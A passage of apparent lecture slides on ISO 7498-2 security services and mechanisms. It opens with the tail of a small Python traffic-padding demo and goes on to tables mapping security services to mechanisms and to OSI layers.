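MESSAGES = [b"BUY", b"SELL 100 shares of ACME", b"x" * 70]

if __name__ == "__main__":
    print("unpadded sizes:", observed_sizes(MESSAGES))
    print("padded sizes:  ", observed_sizes([pad(m) for m in MESSAGES] + [dummy()]))
```

Bucketing hides exact lengths but still leaks the size class (the 70-byte message occupies two buckets), and dummy traffic only hides timing if it is sent on a schedule independent of the real traffic; both are the bandwidth cost of traffic flow confidentiality.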
Pervasive Security Mechanisms
• Five types identified:
– trusted functionality,
– security labels,
– event detection,
– security audit trail,
– security recovery.
Pervasive Mechanisms 1
• Trusted functionality
– Any functionality providing or accessing security
mechanisms should be trustworthy.
– May involve combination of software and hardware.
• Security labels
– Any resource (e.g. stored data, processing power,
communications bandwidth) may have security label
associated with it to indicate security sensitivity.
– Similarly labels may be associated with users.
Labels may need to be securely bound to
transferred data.
Pervasive Mechanisms 2
• Event detection
– Includes detection of
• attempted security violations,
• legitimate security-related activity.
– Can be used to trigger event reporting (alarms), event logging,
automated recovery.
• Security audit trail
– Log of past security-related events.
– Permits detection and investigation of past security breaches.
• Security recovery
– Includes mechanisms to handle requests to recover from
security failures.
– May include immediate abort of operations, temporary
invalidation of an entity, addition of entity to a blacklist.
Services Versus Mechanisms
• ISO 7498-2 indicates which mechanisms can
be used to provide which services.
• Illustrative NOT definitive.
• Omissions include:
– use of integrity mechanisms to help provide
authentication services,
– use of encipherment to help provide non-repudiation
service (as part of notarisation).
Service/Mechanism Table 1
Service                                   Encipherment  Digital sign.  Access control  Data integrity
Entity authentication                     Y             Y              -               -
Origin authentication                     Y             Y              -               -
Access control                            -             -              Y               -
Connection confidentiality                Y             -              -               -
Connectionless confidentiality            Y             -              -               -
Selective field confidentiality           Y             -              -               -
Traffic flow confidentiality              Y             -              -               -
Connection integrity with recovery        Y             -              -               Y
Connection integrity without recovery     Y             -              -               Y
Selective field connection integrity      Y             -              -               Y
Connectionless integrity                  Y             Y              -               Y
Selective field connectionless integrity  Y             Y              -               Y
Non-repudiation of origin                 -             Y              -               Y
Non-repudiation of delivery               -             Y              -               Y
Service/Mechanism Table 2
Service                                   Auth. exchange  Traffic padding  Routing control  Notarisation
Entity authentication                     Y               -                -                -
Origin authentication                     -               -                -                -
Access control                            -               -                -                -
Connection confidentiality                -               -                Y                -
Connectionless confidentiality            -               -                Y                -
Selective field confidentiality           -               -                -                -
Traffic flow confidentiality              -               Y                Y                -
Connection integrity with recovery        -               -                -                -
Connection integrity without recovery     -               -                -                -
Selective field connection integrity      -               -                -                -
Connectionless integrity                  -               -                -                -
Selective field connectionless integrity  -               -                -                -
Non-repudiation of origin                 -               -                -                Y
Non-repudiation of delivery               -               -                -                Y
1.9 Security Services And Layers
• ISO 7498-2 lays down which security services
can be provided in which of the 7 layers.
• Layers 1 and 2 may only provide confidentiality
services.
• Layers 3/4 may provide many services.
• Layer 7 may provide all services.
• A set of principles dictate which services
can/should be provided at which layers.
• We’ll return to this issue in Lectures 5 and 6.
Service/Layer Table
Service                                   Layer 1  Layer 2  Layer 3  Layer 4  Layer 5/6  Layer 7
Entity authentication                     -        -        Y        Y        -          Y
Origin authentication                     -        -        Y        Y        -          Y
Access control                            -        -        Y        Y        -          Y
Connection confidentiality                Y        Y        Y        Y        -          Y
Connectionless confidentiality            -        Y        Y        Y        -          Y
Selective field confidentiality           -        -        -        -        -          Y
Traffic flow confidentiality              Y        -        Y        -        -          Y
Connection integrity with recovery        -        -        -        Y        -          Y
Connection integrity without recovery     -        -        Y        Y        -          Y
Selective field connection integrity      -        -        -        -        -          Y
Connectionless integrity                  -        -        Y        Y        -          Y
Selective field connectionless integrity  -        -        -        -        -          Y
Non-repudiation of origin                 -        -        -        -        -          Y
Non-repudiation of delivery               -        -        -        -        -          Y